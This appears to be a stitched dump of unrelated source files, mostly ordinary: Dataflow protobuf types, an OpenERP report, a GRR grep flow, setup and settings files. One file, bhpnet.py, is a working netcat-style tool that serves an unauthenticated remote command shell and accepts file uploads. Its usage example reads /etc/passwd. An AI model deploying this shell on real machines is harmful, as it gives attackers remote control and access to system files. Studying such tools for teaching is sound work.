Timestamp associated with the metric value.
Optional when workers are reporting work
progress; it will be filled in responses from
the metrics API.
"""
name = proto.Field(proto.MESSAGE, number=1, message="MetricStructuredName",)
kind = proto.Field(proto.STRING, number=2,)
cumulative = proto.Field(proto.BOOL, number=3,)
scalar = proto.Field(proto.MESSAGE, number=4, message=struct_pb2.Value,)
mean_sum = proto.Field(proto.MESSAGE, number=5, message=struct_pb2.Value,)
mean_count = proto.Field(proto.MESSAGE, number=6, message=struct_pb2.Value,)
set_ = proto.Field(proto.MESSAGE, number=7, message=struct_pb2.Value,)
distribution = proto.Field(proto.MESSAGE, number=11, message=struct_pb2.Value,)
gauge = proto.Field(proto.MESSAGE, number=12, message=struct_pb2.Value,)
internal = proto.Field(proto.MESSAGE, number=8, message=struct_pb2.Value,)
update_time = proto.Field(proto.MESSAGE, number=9, message=timestamp_pb2.Timestamp,)
class GetJobMetricsRequest(proto.Message):
r"""Request to get job metrics.
Attributes:
project_id (str):
A project id.
job_id (str):
The job to get metrics for.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Return only metric data that has changed
since this time. Default is to return all
information about all metrics for the job.
location (str):
The [regional endpoint]
(https://cloud.google.com/dataflow/docs/concepts/regional-endpoints)
that contains the job specified by job_id.
"""
project_id = proto.Field(proto.STRING, number=1,)
job_id = proto.Field(proto.STRING, number=2,)
start_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
location = proto.Field(proto.STRING, number=4,)
class JobMetrics(proto.Message):
r"""JobMetrics contains a collection of metrics describing the
detailed progress of a Dataflow job. Metrics correspond to user-
defined and system-defined metrics in the job.
This resource captures only the most recent values of each
metric; time-series data can be queried for them (under the same
metric names) from Cloud Monitoring.
Attributes:
metric_time (google.protobuf.timestamp_pb2.Timestamp):
Timestamp as of which metric values are
current.
metrics (Sequence[google.cloud.dataflow_v1beta3.types.MetricUpdate]):
All metrics for this job.
"""
metric_time = proto.Field(proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,)
metrics = proto.RepeatedField(proto.MESSAGE, number=2, message="MetricUpdate",)
class GetJobExecutionDetailsRequest(proto.Message):
r"""Request to get job execution details.
Attributes:
project_id (str):
A project id.
job_id (str):
The job to get execution details for.
location (str):
The [regional endpoint]
(https://cloud.google.com/dataflow/docs/concepts/regional-endpoints)
that contains the job specified by job_id.
page_size (int):
If specified, determines the maximum number
of stages to return. If unspecified, the
service may choose an appropriate default, or
may return an arbitrarily large number of
results.
page_token (str):
If supplied, this should be the value of next_page_token
returned by an earlier call. This will cause the next page
of results to be returned.
"""
project_id = proto.Field(proto.STRING, number=1,)
job_id = proto.Field(proto.STRING, number=2,)
location = proto.Field(proto.STRING, number=3,)
page_size = proto.Field(proto.INT32, number=4,)
page_token = proto.Field(proto.STRING, number=5,)
class ProgressTimeseries(proto.Message):
r"""Information about the progress of some component of job
execution.
Attributes:
current_progress (float):
The current progress of the component, in the range [0,1].
data_points (Sequence[google.cloud.dataflow_v1beta3.types.ProgressTimeseries.Point]):
History of progress for the component.
Points are sorted by time.
"""
class Point(proto.Message):
r"""A point in the timeseries.
Attributes:
time (google.protobuf.timestamp_pb2.Timestamp):
The timestamp of the point.
value (float):
The value of the point.
"""
time = proto.Field(proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,)
value = proto.Field(proto.DOUBLE, number=2,)
current_progress = proto.Field(proto.DOUBLE, number=1,)
data_points = proto.RepeatedField(proto.MESSAGE, number=2, message=Point,)
class StageSummary(proto.Message):
r"""Information about a particular execution stage of a job.
Attributes:
stage_id (str):
ID of this stage
state (google.cloud.dataflow_v1beta3.types.ExecutionState):
State of this stage.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Start time of this stage.
end_time (google.protobuf.timestamp_pb2.Timestamp):
End time of this stage.
If the work item is completed, this is the
actual end time of the stage. Otherwise, it is
the predicted end time.
progress (google.cloud.dataflow_v1beta3.types.ProgressTimeseries):
Progress for this stage.
Only applicable to Batch jobs.
metrics (Sequence[google.cloud.dataflow_v1beta3.types.MetricUpdate]):
Metrics for this stage.
"""
stage_id = proto.Field(proto.STRING, number=1,)
state = proto.Field(proto.ENUM, number=2, enum="ExecutionState",)
start_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,)
progress = proto.Field(proto.MESSAGE, number=5, message="ProgressTimeseries",)
metrics = proto.RepeatedField(proto.MESSAGE, number=6, message="MetricUpdate",)
class JobExecutionDetails(proto.Message):
r"""Information about the execution of a job.
Attributes:
stages (Sequence[google.cloud.dataflow_v1beta3.types.StageSummary]):
The stages of the job execution.
next_page_token (str):
If present, this response does not contain all requested
tasks. To obtain the next page of results, repeat the
request with page_token set to this value.
"""
@property
def raw_page(self):
return self
stages = proto.RepeatedField(proto.MESSAGE, number=1, message="StageSummary",)
next_page_token = proto.Field(proto.STRING, number=2,)
class GetStageExecutionDetailsRequest(proto.Message):
r"""Request to get information about a particular execution stage
of a job. Currently only tracked for Batch jobs.
Attributes:
project_id (str):
A project id.
job_id (str):
The job to get execution details for.
location (str):
The [regional endpoint]
(https://cloud.google.com/dataflow/docs/concepts/regional-endpoints)
that contains the job specified by job_id.
stage_id (str):
The stage for which to fetch information.
page_size (int):
If specified, determines the maximum number
of work items to return. If unspecified, the
service may choose an appropriate default, or
may return an arbitrarily large number of
results.
page_token (str):
If supplied, this should be the value of next_page_token
returned by an earlier call. This will cause the next page
of results to be returned.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Lower time bound of work items to include, by
start time.
end_time (google.protobuf.timestamp_pb2.Timestamp):
Upper time bound of work items to include, by
start time.
"""
project_id = proto.Field(proto.STRING, number=1,)
job_id = proto.Field(proto.STRING, number=2,)
location = proto.Field(proto.STRING, number=3,)
stage_id = proto.Field(proto.STRING, number=4,)
page_size = proto.Field(proto.INT32, number=5,)
page_token = proto.Field(proto.STRING, number=6,)
start_time = proto.Field(proto.MESSAGE, number=7, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=8, message=timestamp_pb2.Timestamp,)
class WorkItemDetails(proto.Message):
r"""Information about an individual work item execution.
Attributes:
task_id (str):
Name of this work item.
attempt_id (str):
Attempt ID of this work item
start_time (google.protobuf.timestamp_pb2.Timestamp):
Start time of this work item attempt.
end_time (google.protobuf.timestamp_pb2.Timestamp):
End time of this work item attempt.
If the work item is completed, this is the
actual end time of the work item. Otherwise, it
is the predicted end time.
state (google.cloud.dataflow_v1beta3.types.ExecutionState):
State of this work item.
progress (google.cloud.dataflow_v1beta3.types.ProgressTimeseries):
Progress of this work item.
metrics (Sequence[google.cloud.dataflow_v1beta3.types.MetricUpdate]):
Metrics for this work item.
"""
task_id = proto.Field(proto.STRING, number=1,)
attempt_id = proto.Field(proto.STRING, number=2,)
start_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,)
state = proto.Field(proto.ENUM, number=5, enum="ExecutionState",)
progress = proto.Field(proto.MESSAGE, number=6, message="ProgressTimeseries",)
metrics = proto.RepeatedField(proto.MESSAGE, number=7, message="MetricUpdate",)
class WorkerDetails(proto.Message):
r"""Information about a worker
Attributes:
worker_name (str):
Name of this worker
work_items (Sequence[google.cloud.dataflow_v1beta3.types.WorkItemDetails]):
Work items processed by this worker, sorted
by time.
"""
worker_name = proto.Field(proto.STRING, number=1,)
work_items = proto.RepeatedField(
proto.MESSAGE, number=2, message="WorkItemDetails",
)
class StageExecutionDetails(proto.Message):
r"""Information about the workers and work items within a stage.
Attributes:
workers (Sequence[google.cloud.dataflow_v1beta3.types.WorkerDetails]):
Workers that have done work on the stage.
next_page_token (str):
If present, this response does not contain all requested
tasks. To obtain the next page of results, repeat the
request with page_token set to this value.
"""
@property
def raw_page(self):
return self
workers = proto.RepeatedField(proto.MESSAGE, number=1, message="WorkerDetails",)
next_page_token = proto.Field(proto.STRING, number=2,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
apache-2.0
| -5,073,147,159,870,581,000
| 40.196602
| 98
| 0.654274
| false
| 4.253885
| false
| false
| false
|
debug-icons-project/debug-icons-tools
|
code/check_icon_names.py
|
1
|
2994
|
import os
ICON_DATABASE_FOLDER = "../icon-database"
def check_for_context_problems(themes):
print "Checking the following themes for icons in multiple contexts:"
print ", ".join(themes)
print
Icons = {}
for theme in themes:
with open(os.path.join(ICON_DATABASE_FOLDER, theme + ".txt"), "r") as f:
icons = f.read().splitlines()
for icon in icons:
context, name = icon.split("/")
if not Icons.has_key(name):
Icons[name] = {}
if not Icons[name].has_key(context):
Icons[name][context] = []
Icons[name][context].append(theme)
names = Icons.keys()
names.sort()
for name in names:
data = Icons[name]
number_of_contexts_for_current_icon = len(data.keys())
if number_of_contexts_for_current_icon == 1:
# everything is fine, the icon has the same context in all themes
# themes = data[data.keys()[0]]
# number_of_themes = len(themes)
# if number_of_themes != 1:
# print name, themes
# print name, data
# print
# print
pass
else:
print name
for category in data.keys():
# print category, data[category]
for theme in data[category]:
print " %-13s:" %category, theme
print
# print
correct_icons = 0
incorrect_icons = 0
for name, data in Icons.iteritems():
number_of_contexts_for_current_icon = len(data.keys())
if number_of_contexts_for_current_icon == 1:
correct_icons += 1
else:
incorrect_icons += 1
print "Icons with unique contexts: ", correct_icons
print "Icons with multiple contexts:", incorrect_icons
if __name__ == "__main__":
import sys
nparams = len(sys.argv) - 1
# Please note:
# - all themes must be in the "../base_themes/" subfolder!
# - the themename is the folder of the theme, notthe one given in the index.theme file
# - one could implement direct support of locally installed theme files in /usr/share/icons
# but creating symlinks in the ".../base_themes/" folder might be easier
# if there are parameters passed via command line then these are treated as theme names...
if nparams >= 1:
themes = sys.argv[1:]
# ... otherwise use all the available theme folders
else:
# get all files inthe base theme folder
themes = os.listdir(ICON_DATABASE_FOLDER)
# remove all folder in which 'index.theme' does not exist
themes = [f for f in themes if os.path.isfile(os.path.join(ICON_DATABASE_FOLDER, f))]
# take only file with the ending 'txt' strip the ending
themes = [f[:-4] for f in themes if f.endswith(".txt")]
check_for_context_problems(themes)
|
mit
| 1,633,209,410,626,736,400
| 25.732143
| 95
| 0.565464
| false
| 4.135359
| false
| false
| false
|
Johnzero/erp
|
openerp/addons/fg_account/report/period_check.py
|
1
|
6379
|
# -*- coding: utf-8 -*-
import tools
from osv import fields, osv
class reconcile_item(osv.osv_memory):
_name = "fg_account.reconcile.item"
_columns = {
'ref_doc':fields.reference('单据', selection=[('fg_sale.order','销售订单'),('fg_account.bill','收款单')],
size=128, readonly=True),
'o_date': fields.date('单据日期', readonly=True),
'name':fields.char('单号', size=24),
'o_partner': fields.many2one('res.partner', '客户', readonly=True),
't':fields.char('项目', size=12, readonly=True),
'reconciled':fields.boolean('已对账', readonly=True),
'cleared':fields.boolean('已清账', readonly=True),
'amount': fields.float('金额', digits=(16,4), readonly=True),
'balance':fields.float('余额', digits=(16,4), readonly=True),
'note':fields.text('附注'),
}
_order = 'o_date asc'
def button_view(self, cr, uid, ids, context=None):
record = self.browse(cr, uid, ids)[0]
r = {
'type': 'ir.actions.act_window',
'name': '查看单据',
'view_mode': 'form',
'view_type': 'form',
'res_model': record.ref_doc._table_name,
'res_id': record.ref_doc.id,
'target': 'new',
'context': context,
}
#if record.ref_doc._table_name == 'fg_account.bill':
# r['res_id'] = record.id - 1000000000
#
#print r
return r
class period_check(osv.osv):
_name = "fg_account.period.check"
_auto = False
_rec_name = 'ref_doc'
_columns = {
'ref_doc':fields.reference('单据', selection=[('fg_sale.order','销售订单'),('fg_account.bill','收款单')],
size=128, readonly=True),
'o_date': fields.date('单据日期', readonly=True),
'name':fields.char('单号', size=24),
'o_partner': fields.many2one('res.partner', '客户', readonly=True),
't':fields.char('项目', size=12, readonly=True),
'reconciled':fields.boolean('已对账', readonly=True),
'cleared':fields.boolean('已清账', readonly=True),
'amount': fields.float('金额', digits=(16,4), readonly=True),
'due_date_from':fields.function(lambda *a,**k:{}, method=True, type='date',string="开始日期"),
'due_date_to':fields.function(lambda *a,**k:{}, method=True, type='date',string="结束日期"),
'note':fields.text('附注'),
}
_order = 'o_date asc'
def button_view(self, cr, uid, ids, context=None):
record = self.browse(cr, uid, ids)[0]
r = {
'type': 'ir.actions.act_window',
'name': '查看单据',
'view_mode': 'form',
'view_type': 'form',
'res_model': record.ref_doc._table_name,
'res_id': record.id,
'target': 'new',
'context': context,
}
if record.ref_doc._table_name == 'fg_account.bill':
r['res_id'] = record.id - 1000000000
return r
def button_clear(self, cr, uid, ids, context=None):
order_obj = self.pool.get('fg_sale.order')
#this should all be order.
#check_record's id IS the id of order.
order_obj.write(cr, uid, ids, {'clear':True})
return True
def button_unclear(self, cr, uid, ids, context=None):
order_obj = self.pool.get('fg_sale.order')
#this should all be order.
#check_record's id IS the id of order.
order_obj.write(cr, uid, ids, {'clear':False})
return True
def init(self, cr):
tools.drop_view_if_exists(cr, 'fg_account_period_check')
cr.execute("""
create or replace view fg_account_period_check as (
(
SELECT
o."id" AS ID,
o.name as name,
'fg_sale.order,' || o."id" AS ref_doc,
o.date_order AS o_date,
o.partner_id AS o_partner,
'发货额' AS T,
o.reconciled AS reconciled,
SUM(line.subtotal_amount)AS amount,
o.note AS note,
o.clear as cleared
FROM
fg_sale_order_line line
JOIN fg_sale_order o ON o."id" = line.order_id
WHERE
o."state" = 'done'
AND NOT o.minus
GROUP BY
o. ID,
o."name",
o.date_confirm,
o.partner_id
)
UNION ALL
(
SELECT
o."id" AS ID,
o.name as name,
'fg_sale.order,' || o."id" AS ref_doc,
o.date_order AS o_date,
o.partner_id AS o_partner,
'退货' AS T,
o.reconciled AS reconciled,
SUM(line.subtotal_amount)AS amount,
o.note AS note,
o.clear as cleared
FROM
fg_sale_order_line line
JOIN fg_sale_order o ON o."id" = line.order_id
WHERE
o."state" = 'done'
AND o.minus
GROUP BY
o. ID,
o."name",
o.date_confirm,
o.partner_id
)
UNION ALL
(
SELECT
(bill."id"+ 1000000000) AS ID,
bill.name as name,
'fg_account.bill,' || bill."id" AS ref_doc,
bill.date_check AS o_date,
bill.partner_id AS o_parnter,
cate."name" AS T,
bill.reconciled AS reconciled,
(0-bill.amount) AS amount,
bill.note AS note,
False as cleared
FROM
fg_account_bill bill
JOIN fg_account_bill_category cate ON bill.category_id = cate. ID
WHERE
bill."state" IN('check', 'done')
)
ORDER BY id desc
)
""")
|
agpl-3.0
| -1,519,215,445,223,832,300
| 32.938202
| 105
| 0.460833
| false
| 3.477069
| false
| false
| false
|
kdschlosser/SonyAPI
|
setup.py
|
1
|
1842
|
# -*- coding: utf-8 -*-
#
# SonyAPI
# External control of Sony Bravia Generation 3 TV's
# Copyright (C) 2017 Kevin G. Schlosser
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import sys
import os
from setuptools import setup, find_packages
from SonyAPI.version import (
__version__,
__author__,
__author_email__,
__url__,
__download_url__,
__description__,
__requirements__,
__keywords__,
__classifiers__,
__license__
)
sys.path.insert(0, '.')
PACKAGE_DIR = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the relevant file
with open(os.path.join(PACKAGE_DIR, 'README.txt'), 'r') as f:
__long_description__ = f.read().encode('utf-8')
setup(
name='SonyAPI',
version=__version__,
description=__description__,
long_description=__long_description__,
install_requires=__requirements__,
maintainer=__author__,
author=__author__,
author_email=__author_email__,
zip_safe=True,
packages=find_packages(),
include_package_data=True,
url=__url__,
download_url=__download_url__,
keywords=__keywords__,
classifiers=__classifiers__,
license=__license__,
)
|
gpl-2.0
| 2,833,613,687,066,089,000
| 28.238095
| 73
| 0.679696
| false
| 3.869748
| false
| false
| false
|
MiniSEC/GRR_clone
|
lib/flows/general/grep.py
|
1
|
4124
|
#!/usr/bin/env python
# Copyright 2012 Google Inc. All Rights Reserved.
"""A simple grep flow."""
import time
from grr.lib import aff4
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import type_info
from grr.lib import utils
class Grep(flow.GRRFlow):
"""Greps a file on the client for a pattern or a regex.
This flow operates on files only, see GlobAndGrep if you want to grep a
directory.
Returns to parent flow:
RDFValueArray of BufferReference objects.
"""
category = "/Filesystem/"
XOR_IN_KEY = 37
XOR_OUT_KEY = 57
flow_typeinfo = type_info.TypeDescriptorSet(
type_info.GrepspecType(
description="The file which will be grepped.",
name="request"),
type_info.String(
description="The output collection.",
name="output",
default="analysis/grep/{u}-{t}"),
)
@flow.StateHandler(next_state=["StoreResults"])
def Start(self):
"""Start Grep flow."""
self.state.request.xor_in_key = self.XOR_IN_KEY
self.state.request.xor_out_key = self.XOR_OUT_KEY
# For literal matches we xor the search term. In the event we search the
# memory this stops us matching the GRR client itself.
if self.state.request.literal:
self.state.request.literal = utils.Xor(self.state.request.literal,
self.XOR_IN_KEY)
self.state.Register("output_collection", None)
self.CallClient("Grep", self.state.request, next_state="StoreResults")
@flow.StateHandler()
def StoreResults(self, responses):
if responses.success:
output = self.state.output.format(t=time.time(),
u=self.state.context.user)
out_urn = self.client_id.Add(output)
fd = aff4.FACTORY.Create(out_urn, "GrepResultsCollection",
mode="w", token=self.token)
self.state.output_collection = fd
if self.state.request.HasField("literal"):
self.state.request.literal = utils.Xor(self.state.request.literal,
self.XOR_IN_KEY)
fd.Set(fd.Schema.DESCRIPTION("Grep by %s: %s" % (
self.state.context.user, str(self.state.request))))
for response in responses:
response.data = utils.Xor(response.data,
self.XOR_OUT_KEY)
response.length = len(response.data)
fd.Add(response)
self.SendReply(response)
else:
self.Notify("FlowStatus", self.session_id,
"Error grepping file: %s." % responses.status)
@flow.StateHandler()
def End(self):
if self.state.output_collection is not None:
self.state.output_collection.Flush()
self.Notify("ViewObject", self.state.output_collection.urn,
u"Grep completed. %d hits" %
len(self.state.output_collection))
class GrepAndDownload(flow.GRRFlow):
"""Downloads file if a signature is found.
This flow greps a file on the client for a literal or regex and, if the
pattern is found, downloads the file.
"""
category = "/Filesystem/"
flow_typeinfo = (Grep.flow_typeinfo)
@flow.StateHandler(next_state=["DownloadFile"])
def Start(self):
self.state.request.mode = rdfvalue.GrepSpec.Mode.FIRST_HIT
self.CallFlow("Grep", request=self.state.request, next_state="DownloadFile")
@flow.StateHandler(next_state=["StoreDownload", "End"])
def DownloadFile(self, responses):
if responses:
self.Log("Grep completed with %s hits, downloading file.", len(responses))
self.CallFlow("FastGetFile", pathspec=responses.First().pathspec,
next_state="StoreDownload")
else:
self.Log("Grep did not yield any results.")
@flow.StateHandler()
def StoreDownload(self, responses):
if not responses.success:
raise flow.FlowError("Error while downloading file: %s" %
responses.status.error_message)
else:
stat = responses.First()
self.Notify("ViewObject", stat.aff4path,
"File downloaded successfully")
|
apache-2.0
| -9,200,251,228,935,758,000
| 30.968992
| 80
| 0.634336
| false
| 3.793928
| false
| false
| false
|
KelSolaar/Umbra
|
umbra/globals/ui_constants.py
|
1
|
7560
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
**ui_constants.py**
**Platform:**
Windows, Linux, Mac Os X.
**Description:**
Defines **Umbra** package ui constants through the :class:`UiConstants` class.
**Others:**
"""
from __future__ import unicode_literals
__author__ = "Thomas Mansencal"
__copyright__ = "Copyright (C) 2008 - 2014 - Thomas Mansencal"
__license__ = "GPL V3.0 - http://www.gnu.org/licenses/"
__maintainer__ = "Thomas Mansencal"
__email__ = "thomas.mansencal@gmail.com"
__status__ = "Production"
__all__ = ["UiConstants"]
class UiConstants():
"""
Defines **Umbra** package ui constants.
"""
ui_file = "Umbra.ui"
"""
:param ui_file: Application ui file.
:type ui_file: unicode
"""
processing_ui_file = "Processing.ui"
"""
:param processing_ui_file: Processing ui file.
:type processing_ui_file: unicode
"""
reporter_ui_file = "Reporter.ui"
"""
:param reporter_ui_file: Reporter ui file.
:type reporter_ui_file: unicode
"""
windows_stylesheet_file = "styles/Windows_styleSheet.qss"
"""
:param windows_stylesheet_file: Application Windows Os stylesheet file.
:type windows_stylesheet_file: unicode
"""
darwin_stylesheet_file = "styles/Darwin_styleSheet.qss"
"""
:param darwin_stylesheet_file: Application Mac Os X Os stylesheet file.
:type darwin_stylesheet_file: unicode
"""
linux_stylesheet_file = "styles/Linux_styleSheet.qss"
"""
:param linux_stylesheet_file: Application Linux Os stylesheet file.
:type linux_stylesheet_file: unicode
"""
windows_full_screen_stylesheet_file = "styles/Windows_FullScreen_styleSheet.qss"
"""
:param windows_full_screen_stylesheet_file: Application Windows Os fullscreen stylesheet file.
:type windows_full_screen_stylesheet_file: unicode
"""
darwin_full_screen_stylesheet_file = "styles/Darwin_FullScreen_styleSheet.qss"
"""
:param darwin_full_screen_stylesheet_file: Application Mac Os X Os fullscreen stylesheet file.
:type darwin_full_screen_stylesheet_file: unicode
"""
linux_full_screen_stylesheet_file = "styles/Linux_FullScreen_styleSheet.qss"
"""
:param linux_full_screen_stylesheet_file: Application Linux Os fullscreen stylesheet file.
:type linux_full_screen_stylesheet_file: unicode
"""
windows_style = "plastique"
"""
:param windows_style: Application Windows Os style.
:type windows_style: unicode
"""
darwin_style = "plastique"
"""
:param darwin_style: Application Mac Os X Os style.
:type darwin_style: unicode
"""
linux_style = "plastique"
"""
:param linux_style: Application Linux Os style.
:type linux_style: unicode
"""
settings_file = "preferences/Default_Settings.rc"
"""
:param settings_file: Application defaults settings file.
:type settings_file: unicode
"""
layouts_file = "layouts/Default_Layouts.rc"
"""
:param layouts_file: Application defaults layouts file.
:type layouts_file: unicode
"""
application_windows_icon = "images/Icon_Dark.png"
"""
:param application_windows_icon: Application icon file.
:type application_windows_icon: unicode
"""
splash_screen_image = "images/Umbra_SpashScreen.png"
"""
:param splash_screen_image: Application splashscreen image.
:type splash_screen_image: unicode
"""
logo_image = "images/Umbra_Logo.png"
"""
:param logo_image: Application logo image.
:type logo_image: unicode
"""
default_toolbar_icon_size = 32
"""
:param default_toolbar_icon_size: Application toolbar icons size.
:type default_toolbar_icon_size: int
"""
custom_layouts_icon = "images/Custom_Layouts.png"
"""
:param custom_layouts_icon: Application **Custom Layouts** icon.
:type custom_layouts_icon: unicode
"""
custom_layouts_hover_icon = "images/Custom_Layouts_Hover.png"
"""
:param custom_layouts_hover_icon: Application **Custom Layouts** hover icon.
:type custom_layouts_hover_icon: unicode
"""
custom_layouts_active_icon = "images/Custom_Layouts_Active.png"
"""
:param custom_layouts_active_icon: Application **Custom Layouts** active icon.
:type custom_layouts_active_icon: unicode
"""
miscellaneous_icon = "images/Miscellaneous.png"
"""
:param miscellaneous_icon: Application **Miscellaneous** icon.
:type miscellaneous_icon: unicode
"""
miscellaneous_hover_icon = "images/Miscellaneous_Hover.png"
"""
:param miscellaneous_hover_icon: Application **Miscellaneous** hover icon.
:type miscellaneous_hover_icon: unicode
"""
miscellaneous_active_icon = "images/Miscellaneous_Active.png"
"""
:param miscellaneous_active_icon: Application **Miscellaneous** active icon.
:type miscellaneous_active_icon: unicode
"""
development_icon = "images/Development.png"
"""
:param development_icon: Application **Development** icon.
:type development_icon: unicode
"""
development_hover_icon = "images/Development_Hover.png"
"""
:param development_hover_icon: Application **Development** hover icon.
:type development_hover_icon: unicode
"""
development_active_icon = "images/Development_Active.png"
"""
:param development_active_icon: Application **Development** active icon.
:type development_active_icon: unicode
"""
preferences_icon = "images/Preferences.png"
"""
:param preferences_icon: Application **Preferences** icon.
:type preferences_icon: unicode
"""
preferences_hover_icon = "images/Preferences_Hover.png"
"""
:param preferences_hover_icon: Application **Preferences** hover icon.
:type preferences_hover_icon: unicode
"""
preferences_active_icon = "images/Preferences_Active.png"
"""
:param preferences_active_icon: Application **Preferences** active icon.
:type preferences_active_icon: unicode
"""
startup_layout = "startup_centric"
"""
:param startup_layout: Application startup layout.
:type startup_layout: unicode
"""
help_file = "http://thomasmansencal.com/Sharing/Umbra/Support/Documentation/Help/Umbra_Manual.html"
"""
:param help_file: Application online help file.
:type help_file: unicode
"""
api_file = "http://thomasmansencal.com/Sharing/Umbra/Support/Documentation/Api/index.html"
"""
:param api_file: Application online Api file.
:type api_file: unicode
"""
development_layout = "development_centric"
"""
:param development_layout: Application development layout.
:type development_layout: unicode
"""
python_grammar_file = "grammars/Python/Python.grc"
"""
:param python_grammar_file: Python language grammar file.
:type python_grammar_file: unicode
"""
logging_grammar_file = "grammars/Logging/Logging.grc"
"""
:param logging_grammar_file: Logging language grammar file.
:type logging_grammar_file: unicode
"""
text_grammar_file = "grammars/Text/Text.grc"
"""
:param text_grammar_file: Text language grammar file.
:type text_grammar_file: unicode
"""
invalid_link_html_file = "htmls/Invalid_Link.html"
"""
:param invalid_link_html_file: Invalid link html file.
:type invalid_link_html_file: unicode
"""
crittercism_id = "5075c158d5f9b9796b000002"
"""
:param crittercism_id: Crittercism Id.
:type crittercism_id: unicode
"""
|
gpl-3.0
| 371,396,141,367,701,060
| 29.857143
| 103
| 0.667725
| false
| 3.655706
| false
| false
| false
|
kalcho83/black-hat-python
|
bhpnet.py
|
1
|
8452
|
#!/opt/local/bin/python2.7
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
# this runs a command and returns the output
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
# this handles incoming client connections
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send("<BHP:#> ")
# now we receive until we see a linefeed (enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# we have a valid command so execute it and send back the results
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
# this is for incoming connections
def server_loop():
global target
global port
# if no target is defined we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start()
# if we don't listen we are a client....make it so.
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target,port))
# if we detect input from stdin send it
# if not we are going to wait for the user to punch some in
if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
# wait for more input
buffer = raw_input("")
buffer += "\n"
# send it off
client.send(buffer)
except:
# just catch generic errors - you can do your homework to beef this up
print "[*] Exception! Exiting."
# teardown the connection
client.close()
def usage():
print "Netcat Replacement"
print
print "Usage: bhpnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print
print
print "Examples: "
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands and drop a shell back
# depending on our command line options above
if listen:
server_loop()
main()
|
gpl-3.0
| -4,140,704,907,797,089,300
| 34.074689
| 133
| 0.428064
| false
| 5.520575
| false
| false
| false
|
callowayproject/django-massmedia
|
example/settings.py
|
1
|
4213
|
# Django settings for example project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
import os
import sys
APP = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
PROJ_ROOT = os.path.abspath(os.path.dirname(__file__))
sys.path.append(APP)
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
